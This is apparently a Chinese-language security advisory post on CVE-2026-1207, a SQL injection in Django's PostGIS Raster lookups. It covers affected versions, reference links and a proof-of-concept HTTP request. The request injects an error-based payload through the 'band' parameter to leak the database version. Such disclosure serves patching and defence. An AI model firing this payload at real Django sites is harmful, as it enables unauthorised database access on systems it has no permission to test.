CVE-2026-1207｜Django SQL注入漏洞（POC）

0x00 前言

Django是一款由Python编写的开源Web应用框架，诞生于新闻网站的快速开发需求，遵循DRY（不重复造轮子）和“约定优于配置”原则，以MTV（模型-模板-视图）架构实现组件解耦。它提供全栈式开发工具，内置ORM让开发者用Python类操作数据库，无需编写SQL；自动生成的Admin后台可快速实现数据的增删改查；灵活的URL路由系统支持正则表达式匹配；模板引擎支持逻辑渲染与前后端分离；还集成了用户认证、表单验证、缓存机制等核心功能，同时内置SQL注入、XSS、CSRF等常见Web攻击防护。

凭借“开箱即用”的特性，Django能高效支撑内容管理系统、社交平台、电商网站、API后端等中大型项目，拥有活跃的社区生态和丰富的第三方扩展库，是Python Web开发领域的主流框架之一。

0x01 漏洞描述

在RasterField上执行的Raster lookups（仅在PostGIS上实现）允许远程攻击者通过带索引参数注入SQL。

0x02 CVE编号

CVE-2026-1207

0x03 影响版本

6.0之前的版本至6.0.2

5.2之前的版本至5.2.11

4.2之前的版本至4.2.28

0x04 漏洞详情

POC：

GET /?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)%20-- HTTP/1.1
Host: {{target}}

0x05 参考链接

https://docs.djangoproject.com/en/dev/releases/security/

https://www.djangoproject.com/weblog/2026/feb/03/security-releases/